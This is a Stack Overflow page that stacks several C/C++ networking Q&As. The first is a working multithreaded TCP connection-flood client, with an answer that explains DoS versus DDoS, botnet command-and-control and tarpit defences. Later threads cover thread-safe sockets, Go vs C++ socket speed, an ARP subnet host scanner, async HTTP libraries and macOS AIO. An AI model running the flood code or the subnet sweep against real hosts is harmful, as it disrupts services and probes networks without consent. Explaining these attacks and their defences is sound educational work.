Can we say that this is simple DDOS botnet? [closed] - c++

Closed. This question is opinion-based. It is not currently accepting answers.
Want to improve this question? Update the question so it can be answered with facts and citations by editing this post.
Closed 9 years ago.
Improve this question
This is a client program based on posix sockets and threads. The program creates multiple threads and is going to lock the server.Can we say that this is simple DDOS botnet ?. The code in C/C++ and for posix platforms.
Here's the code
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
int get_hostname_by_ip(char* h , char* ip)
{
struct hostent *he;
struct in_addr **addr_list;
int i;
if ((he = gethostbyname(h)) == NULL)
{
perror("gethostbyname");
return 1;
}
addr_list = (struct in_addr **) he->h_addr_list;
for(i = 0; addr_list[i] != NULL; i++)
{
strcpy(ip , inet_ntoa(*addr_list[i]) );
return 0;
}
return 1;
}
void client(char* h)
{
int fd;
char* ip = new char[20];
int port = 80;
struct sockaddr_in addr;
char ch[]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
while(1)
{
fd = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_family=AF_INET;
get_hostname_by_ip(h, ip);
addr.sin_addr.s_addr=inet_addr(ip);
addr.sin_port=htons(port);
if(connect(fd, (struct sockaddr*)&addr, sizeof(addr)) < 0)
{
perror("error: can't connect to server\n");
return;
}
if(send(fd, ch, sizeof(ch), 0) < 0)
{
perror("error: can't send\n");
}
close(fd);
}
}
struct info
{
char* h;
int c;
};
void* thread_entry_point(void* i)
{
info* in = (info*)i;
client(in->h);
}
int main(int argc, char** argv)
{
int s = atoi(argv[2]);
pthread_t t[s];
info in = {argv[1], s};
for(int i = 0; i < s; ++i)
{
pthread_create(&t[i], NULL, thread_entry_point, (void*)&in);
}
pthread_join(t[0], NULL);
return 0;
}

No: the first "D" in "DDoS" stands for "Distributed". A single process on a single machine constitutes simple DoS (and from that one machine's point of view, it can be contained with mechanisms such as Unix's limit. From the victim's point of view, just excluding the offending IP at firewall level is often enough -- see below).
For a DDoS you would need some form of command-and-control allowing the process on machine A to lay dormant there, with as little disruption as possible to avoid detection, and then receive from machine B the order to attack machine C. It is the disruptive traffic routed towards C by many instances of A's that would then constitute/cause the actual denial of service against C.
Your code could well be a part of a DDoS bot, with the CC part receiving an instance of info. It would be a good learning tool also, while for real "black hat" purposes it wouldn't be really useful.
This would be much more on topic on security.stackexchange.com.
Resource ratio
In your example we have a ratio of 1:1, i.e., you open one socket, the victim has to allocate one socket. This has the advantage of simplicity (vanilla socket programming is all that's required). On the other hand, it is an attrition war - you must be sure to exhaust the victim's actual resources well before you exhaust your own. Otherwise, you need to upscale the attack recruiting more bots.
However, it turns out that once the victim has fingerprinted the attack, which is not difficult to do, there are several strategies it can employ to thwart it and turn the ratio to its advantage. One such example is TARPIT. By tarpitting hostile connections, a victim can bring a whole network of attackers to their collective knees (there are other strategies that allow faking an initial connection so that the attacker using vanilla approach has to waste a socket and structures, while the defender does nothing except setting things up. While not going to infinity, resource ratio does skyrocket in the defender's advantage).

Related

Threads and sockets, threads and objects more generally

Thanks for your time.
What am I trying to accomplish?
I'm trying to utilise threads to speed up my program. After some profiling I found that a large portion of my program time (a graphics application) is utilised checking on the status of my socket. Obviously not ideal when trying to trim the fat and get down to <16ms per cycle. I'm currently using the select function to check for new data and read if data is available.
What's the problem?
I can't get my head around threads & objects, I had a play with some textbook examples running and joining local functions with threads which worked fine. Trying to move this into my own code has proved beyond me.
What have I tried?
I've tried looking to smart pointers to allocate my UDPSocket objects on the heap, with the hope that heap memory is accessible by all threads. I've tried good old new & delete for the same reason. I've tried wrapping my UDPSockets inside another object and getting the whole lot to launch on another thread.
In summary It's absolutely certain that I have a big hole in my understanding of threads, I would be grateful for a solution to this specific problem but also links to any good articles, tutorials, video's etc that might help to further my understanding. Perhaps I simply need to re-examine my whole UDPSocket class? Your advice is most welcome.
I'll post my example below, please note I've stripped out all error checking etc for readability.
#pragma once
#define WIN32_MEAN_AND_LEAN
#include <WS2tcpip.h>
#include <iostream>
#include <memory>
#include <thread>
#pragma comment(lib, "ws2_32.lib")
class UDPServer
{
public:
UDPServer(unsigned short port_in)
:
port(port_in)
{
// Startup Winsock
WSADATA data;
WORD version = MAKEWORD(2, 2);
int wsOk = WSAStartup(version, &data);
//Bind socket to port, Any Address
s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
//Hint structure
sockaddr_in serverHint;
serverHint.sin_addr.S_un.S_addr = ADDR_ANY;
serverHint.sin_family = AF_INET;
serverHint.sin_port = htons(port);
bind(s, (sockaddr*)&serverHint, sizeof(serverHint));
}
~UDPServer()
{
closesocket(s);
WSACleanup();
}
bool Recieve()
{
ZeroMemory(&client, clientLength);
if (dataAvailable(s))
{
ZeroMemory(messageBuffer, bufferSize);
int bytesIn = recvfrom(s, messageBuffer, bufferSize, 0, (sockaddr*)&client, &clientLength);
char clientIP[bufferSize];
ZeroMemory(clientIP, bufferSize);
inet_ntop(AF_INET, &client.sin_addr, clientIP, 256);
return true;
}
return false;
}
std::string GetNetworkMessage()
{
std::string message = messageBuffer;
return message;
}
private:
bool dataAvailable(int sock, int interval = 6000)
{
fd_set fds;
FD_ZERO(&fds);
FD_SET(sock, &fds);
timeval tv;
tv.tv_sec = 0;
tv.tv_usec = interval;
return (select(sock + 1, &fds, 0, 0, &tv) == 1);
}
private:
SOCKET s;
sockaddr_in client;
int clientLength = sizeof(client);
static constexpr int bufferSize = 512;
unsigned short port;
char messageBuffer[bufferSize] = {};
};
int main()
{
//Create server object on the heap.
std::unique_ptr<UDPServer> udp = std::make_unique<UDPServer>(6000);
//Get some new threads mate.
std::thread theThread;
std::string oldString = "";
while (true)
{
//Problems...
theThread = std::thread{udp->Recieve()};
if (udp->GetNetworkMessage() != oldString)
{
//print out any changed data we find.
oldString = udp->GetNetworkMessage();
std::cout << oldString << std::endl;
}
}
}
One of the items you weren't clear on is memory accessibility in threads. In Windows, and likely most other operating systems, any memory accessible in the main thread is also accessible by every other thread in the same process.
There are two issues with regards to threads and that memory. The first is how can more than one thread know where a given variable or class is in memory. This is generally solved by passing a pointer to the new thread when it is created. Most thread creation mechanisms provide a parameter for this. So this is the easier issue to solve.
The harder issue to solve is making sure that one thread doesn't change a variable or class while another thread is using it. Generally this is solved by using a mutual exclusion synchronization object, generally referred to as a mutex or a lock. I suggest learning about the concept of a mutex. But bottom line it only allows one thread at a time to access whatever is locked by that mutex. So if one thread is busy changing or using that object the other thread will wait until the other thread has unlocked the object before continuing.
But when you get into multiple locks, there is something called a deadlock. A simple is demonstrated by: Thread A hold lock 1 and is waiting to get access to lock 2. Thread B meanwhile is holding lock 2 and waiting for access to lock 1. So both threads are stuck waiting on the other. The solution is that anytime you have to hold two locks always take them in the same order. So in this case if both threads always took lock 1 then lock 2 they can't deadlock.
The subject matter you want to learn about is threads and thread synchronization.

Why are Go sockets slower than C++ sockets? [closed]

Closed. This question is not reproducible or was caused by typos. It is not currently accepting answers.
This question was caused by a typo or a problem that can no longer be reproduced. While similar questions may be on-topic here, this one was resolved in a way less likely to help future readers.
Closed 4 years ago.
Improve this question
I benchmarked a simple socket ping pong test in Go and C++. The client begins by sending 0 to the server. The server increments whatever number it gets and sends it back to the client. The client echos the number back to the server, and stops once the number is 1,000,000.
Both the client and the server are on the same computer, so I use a Unix socket in both cases. (I also tried same-host TCP sockets, which showed a similar result).
The Go test takes 14 seconds, whereas the C++ test takes 8 seconds. This is surprising to me because I have run a fair number of Go vs. C++ benchmarks, and generally Go is as performant as C++ as long as I don't trigger the garbage collector.
I am on a Mac, though commenters have also reported that the Go version is slower on Linux.
Wondering if I am missing a way to optimize the Go program or if there are just inefficiencies under the hood.
Below are the commands I run to carry out the test, along with the test results. All code files are pasted at the bottom of this question.
Run Go server:
$ rm /tmp/go.sock
$ go run socketUnixServer.go
Run Go client:
$ go build socketUnixClient.go; time ./socketUnixClient
real 0m14.101s
user 0m5.242s
sys 0m7.883s
Run C++ server:
$ rm /tmp/cpp.sock
$ clang++ -std=c++11 tcpServerIncUnix.cpp -O3; ./a.out
Run C++ client:
$ clang++ -std=c++11 tcpClientIncUnix.cpp -O3; time ./a.out
real 0m8.690s
user 0m0.835s
sys 0m3.800s
Code files
Go server:
// socketUnixServer.go
package main
import (
"log"
"net"
"encoding/binary"
)
func main() {
ln, err := net.Listen("unix", "/tmp/go.sock")
if err != nil {
log.Fatal("Listen error: ", err)
}
c, err := ln.Accept()
if err != nil {
panic(err)
}
log.Println("Connected with client!")
readbuf := make([]byte, 4)
writebuf := make([]byte, 4)
for {
c.Read(readbuf)
clientNum := binary.BigEndian.Uint32(readbuf)
binary.BigEndian.PutUint32(writebuf, clientNum+1)
c.Write(writebuf)
}
}
Go client:
// socketUnixClient.go
package main
import (
"log"
"net"
"encoding/binary"
)
const N = 1000000
func main() {
c, err := net.Dial("unix", "/tmp/go.sock")
if err != nil {
log.Fatal("Dial error", err)
}
defer c.Close()
readbuf := make([]byte, 4)
writebuf := make([]byte, 4)
var currNumber uint32 = 0
for currNumber < N {
binary.BigEndian.PutUint32(writebuf, currNumber)
c.Write(writebuf)
// Read the incremented number from server
c.Read(readbuf[:])
currNumber = binary.BigEndian.Uint32(readbuf)
}
}
C++ server:
// tcpServerIncUnix.cpp
// Server side C/C++ program to demonstrate Socket programming
// #include <iostream>
#include <unistd.h>
#include <stdio.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <string.h>
#include <unistd.h>
// Big Endian (network order)
unsigned int fromBytes(unsigned char b[4]) {
return b[3] | b[2]<<8 | b[1]<<16 | b[0]<<24;
}
void toBytes(unsigned int x, unsigned char (&b)[4]) {
b[3] = x;
b[2] = x>>8;
b[1] = x>>16;
b[0] = x>>24;
}
int main(int argc, char const *argv[])
{
int server_fd, new_socket, valread;
struct sockaddr_un saddr;
int saddrlen = sizeof(saddr);
unsigned char recv_buffer[4] = {0};
unsigned char send_buffer[4] = {0};
server_fd = socket(AF_UNIX, SOCK_STREAM, 0);
saddr.sun_family = AF_UNIX;
strncpy(saddr.sun_path, "/tmp/cpp.sock", sizeof(saddr.sun_path));
saddr.sun_path[sizeof(saddr.sun_path)-1] = '\0';
bind(server_fd, (struct sockaddr *)&saddr, sizeof(saddr));
listen(server_fd, 3);
// Accept one client connection
new_socket = accept(server_fd, (struct sockaddr *)&saddr, (socklen_t*)&saddrlen);
printf("Connected with client!\n");
// Note: if /tmp/cpp.sock already exists, you'll get the Connected with client!
// message before running the client. Delete this file first.
unsigned int x = 0;
while (true) {
valread = read(new_socket, recv_buffer, 4);
x = fromBytes(recv_buffer);
toBytes(x+1, send_buffer);
write(new_socket, send_buffer, 4);
}
}
C++ client:
// tcpClientIncUnix.cpp
// Server side C/C++ program to demonstrate Socket programming
// #include <iostream>
#include <unistd.h>
#include <stdio.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <string.h>
#include <unistd.h>
// Big Endian (network order)
unsigned int fromBytes(unsigned char b[4]) {
return b[3] | b[2]<<8 | b[1]<<16 | b[0]<<24;
}
void toBytes(unsigned int x, unsigned char (&b)[4]) {
b[3] = x;
b[2] = x>>8;
b[1] = x>>16;
b[0] = x>>24;
}
int main(int argc, char const *argv[])
{
int sock, valread;
struct sockaddr_un saddr;
int opt = 1;
int saddrlen = sizeof(saddr);
// We'll be passing uint32's back and forth
unsigned char recv_buffer[4] = {0};
unsigned char send_buffer[4] = {0};
sock = socket(AF_UNIX, SOCK_STREAM, 0);
saddr.sun_family = AF_UNIX;
strncpy(saddr.sun_path, "/tmp/cpp.sock", sizeof(saddr.sun_path));
saddr.sun_path[sizeof(saddr.sun_path)-1] = '\0';
// Accept one client connection
if (connect(sock, (struct sockaddr *)&saddr, sizeof(saddr)) != 0) {
throw("connect failed");
}
int n = 1000000;
unsigned int currNumber = 0;
while (currNumber < n) {
toBytes(currNumber, send_buffer);
write(sock, send_buffer, 4);
// Read the incremented number from server
valread = read(sock, recv_buffer, 4);
currNumber = fromBytes(recv_buffer);
}
}
First of all, I confirm that the Go programs from this question do run noticeably slower than the C++ ones. I think that it's indeed interesting to know why.
I profiled the Go client and server with the pprof and found out that syscall.Syscall takes 70% of the total execution time. According to this ticket, in Go syscalls are approximately 1.4 times slower than in C.
(pprof) top -cum
Showing nodes accounting for 18.78s, 67.97% of 27.63s total
Dropped 44 nodes (cum <= 0.14s)
Showing top 10 nodes out of 44
flat flat% sum% cum cum%
0.11s 0.4% 0.4% 22.65s 81.98% main.main
0 0% 0.4% 22.65s 81.98% runtime.main
18.14s 65.65% 66.05% 19.91s 72.06% syscall.Syscall
0.03s 0.11% 66.16% 12.91s 46.72% net.(*conn).Read
0.10s 0.36% 66.52% 12.88s 46.62% net.(*netFD).Read
0.16s 0.58% 67.10% 12.78s 46.25% internal/poll.(*FD).Read
0.06s 0.22% 67.32% 11.87s 42.96% syscall.Read
0.11s 0.4% 67.72% 11.81s 42.74% syscall.read
0.02s 0.072% 67.79% 9.30s 33.66% net.(*conn).Write
0.05s 0.18% 67.97% 9.28s 33.59% net.(*netFD).Write
I gradually decreased the number of Conn.Write and Conn.Read calls and increased the size of the buffer accordingly, so that the number of transferred bytes stayed the same. The result is that the fewer these calls the program makes, the closer its performance to the C++ version.

Any way to change the behavior of synchronous Windows API SendARP?

I'm writing a local network scanner on Windows to find online hosts with IP Helper Functions, which is equivalent to nmap -PR but without WinPcap. I know SendARP will block and send arp request 3 times if the remote host doesn't respond, so I use std::aync to create one threads for each host, but the problem is I want to send an ARP request every 20ms so it would not be too much arp packets in a very short time.
#include <iostream>
#include <future>
#include <vector>
#include <winsock2.h>
#include <iphlpapi.h>
#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")
using namespace std;
int main(int argc, char **argv)
{
ULONG MacAddr[2]; /* for 6-byte hardware addresses */
ULONG PhysAddrLen = 6; /* default to length of six bytes */
memset(&MacAddr, 0xff, sizeof (MacAddr));
PhysAddrLen = 6;
IPAddr SrcIp = 0;
IPAddr DestIp = 0;
char buf[64] = {0};
size_t start = time(NULL);
std::vector<std::future<DWORD> > vResults;
for (auto i = 1; i< 255; i++)
{
sprintf(buf, "192.168.1.%d", i);
DestIp = inet_addr(buf);
vResults.push_back(std::async(std::launch::async, std::ref(SendARP), DestIp, SrcIp, MacAddr, &PhysAddrLen));
Sleep(20);
}
for (auto it= vResults.begin(); it != vResults.end(); ++it)
{
if (it->get() == NO_ERROR)
{
std::cout<<"host up\n";
}
}
std::cout<<"time elapsed "<<(time(NULL) - start)<<std::endl;
return 0;
}
At first I can do this by calling Sleep(20) after launching a thread, but once SendARP in these threads re-send ARP requests if no replies from remote host, it's out of my control, and I see many requests in a very short time(<10ms) in Wireshark, so my question is:
Any way to make SendARP asynchronous?
if not, can I control the sent timing of SendARP in threads?
There doesn't seem to be any way to force SendARP to act in a non-blocking manner, it would appear that when a host is unreachable, it will try to re-query several times before giving up.
As for the solution, nothing you want to hear. the MSDN Docs state that there's a newer API that deprecates SendARP called ResolveIpNetEntry2 that can also do the same thing, but it also appears to behave in the same manner.
The struct it receives contains a field called ReachabilityTime.LastUnreachable which is: The time, in milliseconds, that a node assumes a neighbor is unreachable after not having received a reachability confirmation.
However, it does not appear to have any real effect.
The best way to do it, is to use WinPCap or some other driver, there doesn't seem to be a way of solving your problem in userland.

Cross platform , C/C++ HTTP library with asynchronous capability [closed]

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
We don’t allow questions seeking recommendations for books, tools, software libraries, and more. You can edit the question so it can be answered with facts and citations.
Closed 1 year ago.
The community reviewed whether to reopen this question 1 year ago and left it closed:
Original close reason(s) were not resolved
Improve this question
I'm looking for a C/C++ library that will work on Windows and Linux which will allow me to asychronously query multiple webservers (1000's per minute) for page headers and download web pages in much the same way WinHttp library does in a windows environment.
So far I've come across libCurl which seems to do what I want but the asychronous aspect looks suspect.
How easy do you think it would be to bypass the idea of using a library and write something simple from scratch based on sockets that could achieve this?
Any comments, advice or suggestions would be very welcomed.
Addendum:- Any body have comments about doing this with libCurl, I said the asychronous aspect may look suspect but does anyone have any experience of of it?
Try libevent HTTP routines. You create an HTTP connection and provide a callback which is invoked when a response arrives (or timeout event fires).
Updated: I built a distributed HTTP connection-throttling proxy and used both th
e client and server portions within the same daemon, all on a single thread. It
worked great.
If you're writing an HTTP client, libevent should be a good fit. The only
limitation I ran into with the server side was lack of configuration options --
the API is a bit sparse if you want to start adding more advanced features; which I expected since it was never intended to replace general-purpose web servers like Apache, Nginx. For example I patched it to add a custom subroutine to limit the overall size of an
inbound HTTP request (e.g. close connection after 10MB read). The code is very well-written and the patch was easy to implement.
I was using the 1.3.x branch; the 2.x branch has some serious performance
improvements over the older releases.
Code example: Found a few minutes and wrote a quick example. This should get you acquainted with the libevent programming style:
#include <stdio.h>
#include <event.h>
#include <evhttp.h>
void
_reqhandler(struct evhttp_request *req, void *state)
{
printf("in _reqhandler. state == %s\n", (char *) state);
if (req == NULL) {
printf("timed out!\n");
} else if (req->response_code == 0) {
printf("connection refused!\n");
} else if (req->response_code != 200) {
printf("error: %u %s\n", req->response_code, req->response_code_line);
} else {
printf("success: %u %s\n", req->response_code, req->response_code_line);
}
event_loopexit(NULL);
}
int
main(int argc, char *argv[])
{
const char *state = "misc. state you can pass as argument to your handler";
const char *addr = "127.0.0.1";
unsigned int port = 80;
struct evhttp_connection *conn;
struct evhttp_request *req;
printf("initializing libevent subsystem..\n");
event_init();
conn = evhttp_connection_new(addr, port);
evhttp_connection_set_timeout(conn, 5);
req = evhttp_request_new(_reqhandler, (void *)state);
evhttp_add_header(req->output_headers, "Host", addr);
evhttp_add_header(req->output_headers, "Content-Length", "0");
evhttp_make_request(conn, req, EVHTTP_REQ_GET, "/");
printf("starting event loop..\n");
event_dispatch();
return 0;
}
Compile and run:
% gcc -o foo foo.c -levent
% ./foo
initializing libevent subsystem..
starting event loop..
in _reqhandler. state == misc. state you can pass as argument to your handler
success: 200 OK
Microsoft's cpprestsdk is an cross platform http library that enables communications with http servers. Here is some sample code on msdn. This uses boost asio on linux and WinHttp on windows
Try https://github.com/ithewei/libhv
libhv is a cross-platform lightweight network library for developing TCP/UDP/SSL/HTTP/WebSocket client/server.
HTTP client example:
auto resp = requests::get("http://127.0.0.1:8080/ping");
if (resp == NULL) {
printf("request failed!\n");
} else {
printf("%d %s\r\n", resp->status_code, resp->status_message());
printf("%s\n", resp->body.c_str());
}
hv::Json jroot;
jroot["user"] = "admin";
jroot["pswd"] = "123456";
http_headers headers;
headers["Content-Type"] = "application/json";
resp = requests::post("127.0.0.1:8080/echo", jroot.dump(), headers);
if (resp == NULL) {
printf("request failed!\n");
} else {
printf("%d %s\r\n", resp->status_code, resp->status_message());
printf("%s\n", resp->body.c_str());
}
// async
int finished = 0;
Request req(new HttpRequest);
req->url = "http://127.0.0.1:8080/echo";
req->method = HTTP_POST;
req->body = "This is an async request.";
req->timeout = 10;
requests::async(req, [&finished](const HttpResponsePtr& resp) {
if (resp == NULL) {
printf("request failed!\n");
} else {
printf("%d %s\r\n", resp->status_code, resp->status_message());
printf("%s\n", resp->body.c_str());
}
finished = 1;
});
For more usage, see https://github.com/ithewei/libhv/blob/master/examples/http_client_test.cpp

AIO on OS X vs Linux - why it doesn't work on Mac OS X 10.6

My question is really simple. Why the code below does work on Linux, and doesn't on Mac OS X 10.6.2 Snow Leopard.
To compile save the file to aio.cc, and compile with g++ aio.cc -o aio -lrt on Linux, and g++ aio.cc -o aio on Mac OS X. I'm using Mac OS X 10.6.2 for testing on a Mac, and Linux kernel 2.6 for testing on Linux.
The failure I see on OS X is aio_write fails with -1 and sets errno to EAGAIN, which simply means "Resource temporarily unavailable". Why is that?
extern "C" {
#include <aio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <errno.h>
#include <signal.h>
}
#include <cassert>
#include <string>
#include <iostream>
using namespace std;
static void
aio_completion_handler(int signo, siginfo_t *info, void *context)
{
using namespace std;
cout << "BLAH" << endl;
}
int main()
{
int err;
struct sockaddr_in sin;
memset(&sin, 0, sizeof(sin));
sin.sin_port = htons(1234);
sin.sin_addr.s_addr = inet_addr("127.0.0.1");
sin.sin_family = PF_INET;
int sd = ::socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sd == -1) {
assert(!"socket() failed");
}
const struct sockaddr *saddr = reinterpret_cast<const struct sockaddr *>(&sin);
err = ::connect(sd, saddr, sizeof(struct sockaddr));
if (err == -1) {
perror(NULL);
assert(!"connect() failed");
}
struct aiocb *aio = new aiocb();
memset(aio, 0, sizeof(struct aiocb));
char *buf = new char[3];
buf[0] = 'a';
buf[1] = 'b';
buf[2] = 'c';
aio->aio_fildes = sd;
aio->aio_buf = buf;
aio->aio_nbytes = 3;
aio->aio_sigevent.sigev_notify = SIGEV_SIGNAL;
aio->aio_sigevent.sigev_signo = SIGIO;
aio->aio_sigevent.sigev_value.sival_ptr = &aio;
struct sigaction sig_act;
sigemptyset(&sig_act.sa_mask);
sig_act.sa_flags = SA_SIGINFO;
sig_act.sa_sigaction = aio_completion_handler;
sigaction(SIGIO, &sig_act, NULL);
errno = 0;
int ret = aio_write(aio);
if (ret == -1) {
perror(NULL);
}
assert(ret != -1);
}
UPDATE (Feb 2010): OSX does not support AIO on sockets at all. Bummer!
The presented code was tested on Mountain Lion 10.8.2. It works with a small correction.
The line
"aio->aio_fildes = sd;"
should be changed for example to:
aio->aio_fildes = open( "/dev/null", O_RDWR);
to get the expected result.
see manual. "The aio_write() function allows the calling process to perform an asynchronous write to a previously opened file."
I have code very similar to yours on 10.6.2 (but writing to a file) working without any problems - so it is possible to do what you're trying.
Just out of curiosity, what value are you using for the SIGIO constant ?
I found that an invalid value here in OS X would casue aio_write to fail - so
I always pass SIGUSR1.
Maybe check the return value of sigaction() to verify the signal details?
The points raised in your links all point to a different method for raising io completion notifications (e.g. kqueue which is a BSD specific mechanism), but doesn't really answer your question re POSIX methods for async io. and whether they work on Darwin.
The UNIX world really is a mish mash of solutions for this, and it would be really good if there was one tried and tested solutiom that worked across all platforms, alas currently there's not - POSIX being the one that aims for the most consistency.
It's a bit of a stab in the dark, but it might be useful as well to set nonblocking on your socket handle ( i.e. set socket option O_NONBLOCK ) as well as using SIGUSR1
If I get some time I'll work with your socket sample and see if I can get anything out of that too.
Best of luck.
OSX Allows you to use sockets via the (CF)RunLoop. Or getting callbacks from the runloop.
That is the most elegant way I have found to use async IO on mac.
You can use your existing socket and do a CFSocketCreateWithNative. And register callbacks on your runloop.
Here is a small snippet of code that shows how it can be setup, incomplete since I have cut down on a source file...
// This will setup a readCallback
void SocketClass::setupCFCallback() {
CFSocketContext context = { 0, this, NULL, NULL, NULL };
if (CFSocketRef macMulticastSocketRef = CFSocketCreateWithNative(NULL, socketHandle_, kCFSocketReadCallBack,readCallBack, &context)) {
if (CFRunLoopSourceRef macRunLoopSrc = CFSocketCreateRunLoopSource(NULL, macMulticastSocketRef, 0)) {
if (!CFRunLoopContainsSource(CFRunLoopGetCurrent(), macRunLoopSrc, kCFRunLoopDefaultMode)) {
CFRunLoopAddSource(CFRunLoopGetCurrent(), macRunLoopSrc, kCFRunLoopDefaultMode);
macRunLoopSrc_ = macRunLoopSrc;
}
else
CFRelease(macRunLoopSrc);
}
else
CFSocketInvalidate(macMulticastSocketRef);
CFRelease(macMulticastSocketRef);
}
}
void SocketClass::readCallBack(CFSocketRef inref, CFSocketCallBackType type,CFDataRef , const void *, void *info) {
if (SocketClass* socket_ptr = reinterpret_cast<SocketClass*>(info))
socket_ptr->receive(); // do stuff with your socket
}